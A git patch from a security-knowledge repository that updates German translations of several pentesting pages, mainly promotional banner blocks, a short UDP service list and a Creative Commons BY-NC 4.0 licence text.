From c6fcd383465ffb79823d61ea03c9082304712901 Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 18 Jul 2024 18:26:56 +0000 Subject: [PATCH] Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md --- 1911-pentesting-fox.md | 50 +++- 6881-udp-pentesting-bittorrent.md | 32 +-- LICENSE.md | 188 ++++++++------ android-forensics.md | 48 ++-- backdoors/icmpsh.md | 39 +-- .../README.md | 146 +++++------ burp-suite.md | 34 +-- c2/icmpsh.md | 39 +-- .../blockchain-and-crypto-currencies.md | 154 +++++------ .../cipher-block-chaining-cbc-mac-priv.md | 62 ++--- crypto-and-stego/crypto-ctfs-tricks.md | 90 +++---- crypto-and-stego/electronic-code-book-ecb.md | 72 +++--- crypto-and-stego/rc4-encrypt-and-decrypt.md | 36 +-- .../cipher-block-chaining-cbc-mac-priv.md | 62 ++--- cryptography/crypto-ctfs-tricks.md | 88 +++---- cryptography/electronic-code-book-ecb.md | 76 +++--- cryptography/hash-length-extension-attack.md | 50 ++-- cryptography/padding-oracle-priv.md | 89 +++---- cryptography/rc4-encrypt-and-decrypt.md | 36 +-- emails-vulns.md | 31 +-- .../linux-exploiting-basic-esp/fusion.md | 65 ++--- exploiting/tools/pwntools.md | 136 ++++------ ...windows-exploiting-basic-guide-oscp-lvl.md | 117 ++++----- .../anti-forensic-techniques.md | 71 ++--- .../docker-forensics.md | 57 ++--- .../file-integrity-monitoring.md | 50 ++-- .../malware-analysis.md | 176 ++++--------- .../file-data-carving-tools.md | 58 +++-- .../pcap-inspection/README.md | 152 ++++------- .../usb-keyboard-pcap-analysis.md | 36 +-- .../pcap-inspection/usb-keystrokes.md | 40 +-- .../pcap-inspection/wifi-pcap-analysis.md | 54 ++-- .../README.md | 34 +-- .../desofuscation-vbs-cscript.exe.md | 66 ++--- .../png-tricks.md | 38 +-- .../video-and-audio-file-analysis.md | 42 +-- .../zips-tricks.md | 52 ++-- .../windows-forensics/README.md | 142 +++++----- .../interesting-windows-registry-keys.md | 78 +++--- .../windows-forensics/windows-processes.md | 90 ++++--- .../docker-forensics.md | 57 ++--- .../file-integrity-monitoring.md | 50 ++-- .../malware-analysis.md | 173 +++---------- .../README.md | 36 +-- .../desofuscation-vbs-cscript.exe.md | 64 ++--- .../png-tricks.md | 38 +-- .../video-and-audio-file-analysis.md | 42 +-- .../zips-tricks.md | 52 ++-- .../interesting-windows-registry-keys.md | 78 +++--- .../exfiltration.md | 69 ++--- .../github-leaked-secrets.md | 38 +-- .../wide-source-code-search.md | 42 +-- .../pentesting-network/dhcpv6.md | 54 ++-- .../pentesting-network/eigrp-attacks.md | 67 ++--- .../glbp-and-hsrp-attacks.md | 54 ++-- .../pentesting-network/ids-evasion.md | 50 ++-- .../network-protocols-explained-esp.md | 68 ++--- .../pentesting-network/nmap-summary-esp.md | 119 ++++----- .../pentesting-network/pentesting-ipv6.md | 110 ++++---- ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 98 +++---- .../pentesting-wifi/evil-twin-eap-tls.md | 68 ++--- .../phishing-methodology/clone-a-website.md | 42 +-- .../python/basic-python.md | 98 +++---- .../python/bruteforce-hash-few-chars.md | 34 +-- .../load_name-load_const-opcode-oob-read.md | 88 ++++--- ...s-pollution-pythons-prototype-pollution.md | 242 ++++++++++++------ .../python/pyscript.md | 62 +++-- .../python/python-internal-read-gadgets.md | 48 ++-- .../shells/README.md | 36 +-- .../shells/full-ttys.md | 60 ++--- .../shells/windows.md | 72 +++--- interesting-http.md | 39 +-- .../ddexec.md | 86 ++++--- .../linux-post-exploitation/README.md | 66 ++--- .../containerd-ctr-privilege-escalation.md | 44 ++-- ...-command-injection-privilege-escalation.md | 146 ++++------- online-platforms-with-api.md | 66 ++--- other-web-tricks.md | 50 ++-- pentesting-dns.md | 35 +-- .../lfi2rce-via-nginx-temp-files.md | 25 +- .../lfi2rce-via-segmentation-fault.md | 40 +-- .../via-php_session_upload_progress.md | 52 ++-- .../browser-http-request-smuggling.md | 34 +-- post-exploitation.md | 48 ++-- .../format-strings/format-strings-template.md | 34 +-- .../rop-leaking-libc-template.md | 42 +-- ...itive-information-disclosure-from-a-web.md | 46 ++-- todo/6881-udp-pentesting-bittorrent.md | 32 +-- todo/burp-suite.md | 34 +-- todo/emails-vulns.md | 31 +-- todo/interesting-http.md | 38 +-- todo/other-web-tricks.md | 50 ++-- todo/pentesting-dns.md | 35 +-- todo/post-exploitation.md | 48 ++-- 94 files changed, 2929 insertions(+), 3377 deletions(-) diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index e6b3e6523..031c020fe 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -1,27 +1,55 @@ # 1911 - Pentesting-Fuchs +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs zu den** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} Und weitere Dienste: -ubiquiti-discover udp "Ubiquiti Networks-Gerät" +ubiquiti-discover udp "Ubiquiti Networks Device" -dht udp "DHT-Knoten" +dht udp "DHT Nodes" 5060 udp sip "SIP/" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1 +![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) + +InfluxDB + +![](<.gitbook/assets/image (337).png>) + +![](<.gitbook/assets/image (338).png>) + +![](<.gitbook/assets/image (339).png>) + +![](<.gitbook/assets/image (340).png>) + +![](<.gitbook/assets/image (341).png>) + +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Unterstützen Sie HackTricks + +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden. + +
+{% endhint %} diff --git a/6881-udp-pentesting-bittorrent.md b/6881-udp-pentesting-bittorrent.md index d58b3101a..ac0552ada 100644 --- a/6881-udp-pentesting-bittorrent.md +++ b/6881-udp-pentesting-bittorrent.md @@ -1,30 +1,14 @@ -
- -Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs zu den** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. - -
- - - +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs zu den** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.
+{% endhint %} diff --git a/LICENSE.md b/LICENSE.md index 385a392e5..f303cf345 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -1,163 +1,197 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen.
+{% endhint %} -Creative Commons-Lizenz
Urheberrecht © Carlos Polop 2021. Sofern nicht anders angegeben (die in das Buch kopierten externen Informationen gehören den ursprünglichen Autoren), steht der Text auf HACK TRICKS von Carlos Polop unter der Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)-Lizenz. +Creative Commons-Lizenz
Copyright © Carlos Polop 2021. Sofern nicht anders angegeben (die externen Informationen, die in das Buch kopiert wurden, gehören den Originalautoren), steht der Text auf HACK TRICKS von Carlos Polop unter der Creative Commons Namensnennung-Nicht kommerziell 4.0 International (CC BY-NC 4.0). -Lizenz: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)
-Lesbare Lizenz: https://creativecommons.org/licenses/by-nc/4.0/
-Vollständige rechtliche Bedingungen: https://creativecommons.org/licenses/by-nc/4.0/legalcode
+Lizenz: Namensnennung-Nicht kommerziell 4.0 International (CC BY-NC 4.0)
+Menschlich lesbare Lizenz: https://creativecommons.org/licenses/by-nc/4.0/
+Vollständige rechtliche Bestimmungen: https://creativecommons.org/licenses/by-nc/4.0/legalcode
Formatierung: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
-# Creative Commons +# creative commons -# Attribution-NonCommercial 4.0 International +# Namensnennung-Nicht kommerziell 4.0 International -Die Creative Commons Corporation ("Creative Commons") ist keine Anwaltskanzlei und bietet keine Rechtsberatung oder Rechtsdienstleistungen an. Die Verbreitung von Creative Commons-Lizenzen schafft keine Anwaltsmandats- oder sonstige Beziehung. Creative Commons stellt seine Lizenzen und zugehörigen Informationen "wie besehen" zur Verfügung. Creative Commons übernimmt keine Gewährleistung für seine Lizenzen, Materialien, die gemäß ihren Bedingungen und Konditionen lizenziert sind, oder zugehörige Informationen. Creative Commons lehnt jegliche Haftung für Schäden ab, die sich aus ihrer Verwendung ergeben, soweit dies rechtlich möglich ist. +Die Creative Commons Corporation ("Creative Commons") ist keine Anwaltskanzlei und bietet keine Rechtsberatung oder Rechtsdienstleistungen an. Die Verbreitung von Creative Commons-Lizenzen schafft keine Anwaltsmandanten- oder andere Beziehungen. Creative Commons stellt ihre Lizenzen und zugehörigen Informationen "wie sie sind" zur Verfügung. Creative Commons übernimmt keine Gewährleistung für ihre Lizenzen, Materialien, die gemäß ihren Bedingungen lizenziert sind, oder zugehörige Informationen. Creative Commons lehnt jegliche Haftung für Schäden ab, die sich aus ihrer Verwendung ergeben, soweit gesetzlich zulässig. -## Verwendung von Creative Commons-Lizenzen +## Verwendung von Creative Commons Public Licenses -Creative Commons-Lizenzen bieten einen standardisierten Satz von Bedingungen, die Urheber und andere Rechteinhaber verwenden können, um originelle Werke des Urheberrechts und andere Materialien, die dem Urheberrecht und bestimmten anderen Rechten unterliegen, zu teilen. Die folgenden Überlegungen dienen nur zu Informationszwecken, sind nicht abschließend und sind kein Bestandteil unserer Lizenzen. +Die öffentlichen Lizenzen von Creative Commons bieten einen standardisierten Satz von Bedingungen, die Urheber und andere Rechteinhaber verwenden können, um originale Werke des geistigen Eigentums und anderes Material, das dem Urheberrecht und bestimmten anderen Rechten unterliegt, gemäß der unten stehenden öffentlichen Lizenz zu teilen. Die folgenden Überlegungen dienen nur zu Informationszwecken, sind nicht erschöpfend und sind kein Bestandteil unserer Lizenzen. -* __Überlegungen für Lizenzgeber:__ Unsere öffentlichen Lizenzen sind für die Verwendung durch diejenigen vorgesehen, die berechtigt sind, der Öffentlichkeit die Erlaubnis zur Nutzung von Material auf Arten zu erteilen, die sonst durch das Urheberrecht und bestimmte andere Rechte eingeschränkt wären. Unsere Lizenzen sind unwiderruflich. Lizenzgeber sollten die Bedingungen der von ihnen gewählten Lizenz lesen und verstehen, bevor sie sie anwenden. Lizenzgeber sollten auch alle erforderlichen Rechte sichern, bevor sie unsere Lizenzen anwenden, damit die Öffentlichkeit das Material wie erwartet wiederverwenden kann. Lizenzgeber sollten deutlich kennzeichnen, welches Material nicht der Lizenz unterliegt. Dies umfasst anderes CC-lizenziertes Material oder Material, das unter eine Ausnahme oder Beschränkung des Urheberrechts fällt. [Weitere Überlegungen für Lizenzgeber](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). +* __Überlegungen für Lizenzgeber:__ Unsere öffentlichen Lizenzen sind für die Verwendung durch diejenigen gedacht, die berechtigt sind, der Öffentlichkeit die Erlaubnis zu geben, Material auf Arten zu nutzen, die durch das Urheberrecht und bestimmte andere Rechte eingeschränkt sind. Unsere Lizenzen sind unwiderruflich. Lizenzgeber sollten die Bedingungen der von ihnen gewählten Lizenz lesen und verstehen, bevor sie sie anwenden. Lizenzgeber sollten auch alle erforderlichen Rechte sichern, bevor sie unsere Lizenzen anwenden, damit die Öffentlichkeit das Material wie erwartet wiederverwenden kann. Lizenzgeber sollten deutlich kennzeichnen, welches Material nicht der Lizenz unterliegt. Dazu gehören anderes CC-lizenziertes Material oder Material, das unter einer Ausnahme oder Beschränkung des Urheberrechts verwendet wird. [Weitere Überlegungen für Lizenzgeber](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). -* __Überlegungen für die Öffentlichkeit:__ Durch die Verwendung einer unserer öffentlichen Lizenzen erteilt ein Lizenzgeber der Öffentlichkeit die Erlaubnis, das lizenzierte Material unter bestimmten Bedingungen zu nutzen. Wenn die Erlaubnis des Lizenzgebers aus irgendeinem Grund nicht erforderlich ist - zum Beispiel aufgrund einer anwendbaren Ausnahme oder Beschränkung des Urheberrechts - unterliegt diese Nutzung nicht der Lizenz. Unsere Lizenzen gewähren nur Berechtigungen im Rahmen des Urheberrechts und bestimmter anderer Rechte, die ein Lizenzgeber gewähren darf. Die Verwendung des lizenzierten Materials kann aus anderen Gründen immer noch eingeschränkt sein, zum Beispiel weil andere Urheberrechte oder andere Rechte an dem Material bestehen. Ein Lizenzgeber kann besondere Anfragen stellen, z.B. dass alle Änderungen gekennzeichnet oder beschrieben werden. Obwohl dies von unseren Lizenzen nicht verlangt wird, wird empfohlen, diese Anfragen nach Möglichkeit zu respektieren. [Weitere Überlegungen für die Öffentlichkeit](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). +* __Überlegungen für die Öffentlichkeit:__ Durch die Verwendung einer unserer öffentlichen Lizenzen gewährt ein Lizenzgeber der Öffentlichkeit die Erlaubnis, das lizenzierte Material unter bestimmten Bedingungen zu nutzen. Wenn die Erlaubnis des Lizenzgebers aus irgendeinem Grund nicht erforderlich ist - zum Beispiel aufgrund einer anwendbaren Ausnahme oder Beschränkung des Urheberrechts - wird diese Nutzung nicht durch die Lizenz reguliert. Unsere Lizenzen gewähren nur Berechtigungen gemäß dem Urheberrecht und bestimmten anderen Rechten, die ein Lizenzgeber gewähren darf. Die Verwendung des lizenzierten Materials kann aus anderen Gründen immer noch eingeschränkt sein, einschließlich der Tatsache, dass andere Urheberrechte oder andere Rechte am Material haben. Ein Lizenzgeber kann spezielle Anfragen stellen, z. B. die Markierung oder Beschreibung aller Änderungen. Obwohl dies von unseren Lizenzen nicht verlangt wird, wird empfohlen, diese Anfragen zu respektieren, soweit dies vernünftig ist. [Weitere Überlegungen für die Öffentlichkeit](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). -# Creative Commons Attribution-NonCommercial 4.0 International Public License +# Creative Commons Namensnennung-Nicht kommerziell 4.0 International Public License -Durch die Ausübung der lizenzierten Rechte (wie unten definiert) akzeptieren und stimmen Sie den Bedingungen dieser Creative Commons Attribution-NonCommercial 4.0 International Public License ("Public License") zu. Soweit diese Public License als Vertrag ausgelegt werden kann, werden Ihnen die lizenzierten Rechte als Gegenleistung für Ihre Annahme dieser Bedingungen gewährt, und der Lizenzgeber gewährt Ihnen solche Rechte als Gegenleistung für die Vorteile, die der Lizenzgeber aus der Bereitstellung des lizenzierten Materials unter diesen Bedingungen erhält. +Durch die Ausübung der Lizenzierten Rechte (unten definiert) akzeptieren und stimmen Sie den Bedingungen dieser Creative Commons Namensnennung-Nicht kommerziell 4.0 International Public License ("Public License") zu. Soweit diese Public License als Vertrag interpretiert werden kann, werden Ihnen die Lizenzierten Rechte als Gegenleistung für Ihre Annahme dieser Bedingungen gewährt, und der Lizenzgeber gewährt Ihnen solche Rechte als Gegenleistung für die Vorteile, die der Lizenzgeber aus der Bereitstellung des Lizenzierten Materials unter diesen Bedingungen erhält. ## Abschnitt 1 - Definitionen. -a. __Adaptiertes Material__ bezeichnet Material, das dem Urheberrecht und ähnlichen Rechten unterliegt und das aus dem lizenzierten Material abgeleitet oder auf ihm basiert und in dem das lizenzierte Material in einer Weise übersetzt, verändert, angeordnet, transformiert oder anderweitig modifiziert wird, die eine Genehmigung gemäß den Urheberrechten und ähnlichen Rechten, die der Lizenzgeber besitzt, erfordert. Im Sinne dieser Public License wird bei einem musikalischen Werk, einer Aufführung oder einer Tonaufnahme immer adaptiertes Material erzeugt, wenn das lizenzierte Material in zeitlicher Beziehung zu einem bewegten Bild synchronisiert wird. +a. __Angepasstes Material__ bezeichnet Material, das dem Urheberrecht und ähnlichen Rechten unterliegt und das aus dem lizenzierten Material abgeleitet ist oder auf diesem basiert und bei dem das lizenzierte Material in einer Weise übersetzt, verändert, angeordnet, transformiert oder anderweitig modifiziert wird, die eine Genehmigung gemäß den Urheberrechten und ähnlichen Rechten erfordert, die der Lizenzgeber besitzt. Im Sinne dieser Public License wird bei einem musikalischen Werk, einer Aufführung oder einer Tonaufnahme immer angepasstes Material produziert, wenn das lizenzierte Material in zeitlicher Beziehung zu einem bewegten Bild synchronisiert wird. -b. __Lizenz des Anpassers__ bezeichnet die Lizenz, die Sie auf Ihre Urheberrechte und ähnlichen Rechte an Ihren Beiträgen zu adaptiertem Material gemäß den Bedingungen dieser Public License anwenden. +b. __Adapter-Lizenz__ bezeichnet die Lizenz, die Sie auf Ihre Urheberrechte und ähnlichen Rechte in Ihren Beiträgen zum angepassten Material gemäß den Bedingungen dieser Public License anwenden. -c. __Urheberrecht und ähnliche Rechte__ bezeichnet das Urheberrecht und/oder ähnliche Rechte, die eng mit dem Urheberrecht verbunden sind, einschließlich, aber nicht beschränkt auf Leistung, Rundfunk, Tonaufnahme und Sui Generis-Datenbankrechte, unabhängig davon, wie die Rechte bezeichnet oder kategorisiert sind. Im Sinne dieser Public License gelten die in Abschnitt 2(b)(1)-(2) genannten Rechte nicht als Urheberrecht und ähnliche Rechte. +c. __Urheberrechte und ähnliche Rechte__ bezeichnen das Urheberrecht und/oder ähnliche Rechte, die eng mit dem Urheberrecht verbunden sind, einschließlich, aber nicht beschränkt auf Leistung, Rundfunk, Tonaufnahme und Datenbankrechte sui generis, unabhängig davon, wie die Rechte bezeichnet oder kategorisiert sind. Im Sinne dieser Public License sind die in Abschnitt 2(b)(1)-(2) genannten Rechte keine Urheberrechte und ähnlichen Rechte. -d. __Wirksame technische Maßnahmen__ bezeichnet Maßnahmen, die ohne ordnungsgemäße Autorisierung nicht umgangen werden dürfen und die den Verpflichtungen aus Artikel 11 des am 20. Dezember 199 -## Abschnitt 2 - Geltungsbereich. +d. __Wirksame Technologische Maßnahmen__ bezeichnen Maßnahmen, die ohne ordnungsgemäße Autorisierung nicht umgangen werden dürfen, wie es die Gesetze erfordern, die die Verpflichtungen aus Artikel 11 des am 20. Dezember 1996 verabschiedeten WIPO-Urheberrechtsvertrags und/oder ähnlichen internationalen Abkommen erfüllen. + +e. __Ausnahmen und Beschränkungen__ bezeichnen die Schranken des fairen Gebrauchs, des fairen Handels und/oder jeder anderen Ausnahme oder Beschränkung der Urheberrechte und ähnlichen Rechte, die für Ihre Nutzung des lizenzierten Materials gelten. + +f. __Lizenziertes Material__ bezeichnet das künstlerische oder literarische Werk, die Datenbank oder ein anderes Material, auf das der Lizenzgeber diese Public License angewendet hat. + +g. __Lizenzierte Rechte__ bezeichnen die Ihnen gemäß den Bedingungen dieser Public License gewährten Rechte, die auf alle Urheberrechte und ähnlichen Rechte beschränkt sind, die für Ihre Nutzung des lizenzierten Materials gelten und die der Lizenzgeber lizenzieren darf. + +h. __Lizenzgeber__ bezeichnet die Einzelperson(en) oder Einrichtung(en), die Rechte gemäß dieser Public License gewähren. + +i. __Nicht kommerziell__ bedeutet nicht hauptsächlich für oder auf kommerziellen Vorteil oder monetäre Entschädigung ausgerichtet. Im Sinne dieser Public License ist der Austausch des lizenzierten Materials gegen anderes Material, das dem Urheberrecht und ähnlichen Rechten unterliegt, durch digitales Filesharing oder ähnliche Mittel nicht kommerziell, sofern keine Zahlung einer monetären Entschädigung im Zusammenhang mit dem Austausch erfolgt. + +j. __Teilen__ bedeutet, Material der Öffentlichkeit auf jede Weise oder durch jeden Prozess bereitzustellen, der die Erlaubnis gemäß den Lizenzierten Rechten erfordert, wie Vervielfältigung, öffentliche Darstellung, öffentliche Aufführung, Verbreitung, Verbreitung, Kommunikation oder Einfuhr, und Material der Öffentlichkeit zugänglich zu machen, einschließlich auf Wegen, auf die die Mitglieder der Öffentlichkeit von einem von ihnen individuell gewählten Ort und zu einer von ihnen individuell gewählten Zeit auf das Material zugreifen können. + +k. __Datenbankrechte sui generis__ bezeichnen Rechte, die sich aus der Richtlinie 96/9/EG des Europäischen Parlaments und des Rates vom 11. März 1996 zum rechtlichen Schutz von Datenbanken ergeben, wie sie geändert und/oder nachfolgend sind, sowie andere im Wesentlichen äquivalente Rechte weltweit. + +l. __Sie__ bezeichnet die Einzelperson oder Einrichtung, die die Lizenzierten Rechte gemäß dieser Public License ausübt. Ihr hat eine entsprechende Bedeutung. +## Abschnitt 2 – Umfang. a. ___Lizenzgewährung.___ -1. Vorbehaltlich der Bedingungen dieser Public License gewährt der Lizenzgeber Ihnen hiermit eine weltweite, gebührenfreie, nicht übertragbare, nicht exklusive, unwiderrufliche Lizenz zur Ausübung der lizenzierten Rechte am lizenzierten Material, um: +1. Vorbehaltlich der Bedingungen dieser Öffentlichen Lizenz gewährt der Lizenzgeber Ihnen hiermit eine weltweite, gebührenfreie, nicht unterlizenzierbare, nicht exklusive, unwiderrufliche Lizenz zur Ausübung der Lizenzrechte am lizenzierten Material, um: -A. das lizenzierte Material ganz oder teilweise für nicht kommerzielle Zwecke zu vervielfältigen und zu teilen; und +A. das lizenzierte Material ganz oder teilweise nur für nicht kommerzielle Zwecke zu vervielfältigen und zu teilen; und -B. angepasstes Material für nicht kommerzielle Zwecke zu erstellen, zu vervielfältigen und zu teilen. +B. angepasstes Material nur für nicht kommerzielle Zwecke zu erstellen, zu vervielfältigen und zu teilen. -2. __Ausnahmen und Einschränkungen.__ Um Missverständnisse zu vermeiden, gilt diese Public License nicht, wenn Ausnahmen und Einschränkungen für Ihre Nutzung gelten, und Sie müssen deren Bedingungen nicht einhalten. +2. __Ausnahmen und Einschränkungen.__ Zur Vermeidung von Zweifeln gilt, dass, wenn Ausnahmen und Einschränkungen für Ihre Nutzung gelten, diese Öffentliche Lizenz nicht gilt und Sie nicht verpflichtet sind, deren Bedingungen zu erfüllen. -3. __Laufzeit.__ Die Laufzeit dieser Public License ist in Abschnitt 6(a) festgelegt. +3. __Laufzeit.__ Die Laufzeit dieser Öffentlichen Lizenz ist in Abschnitt 6(a) 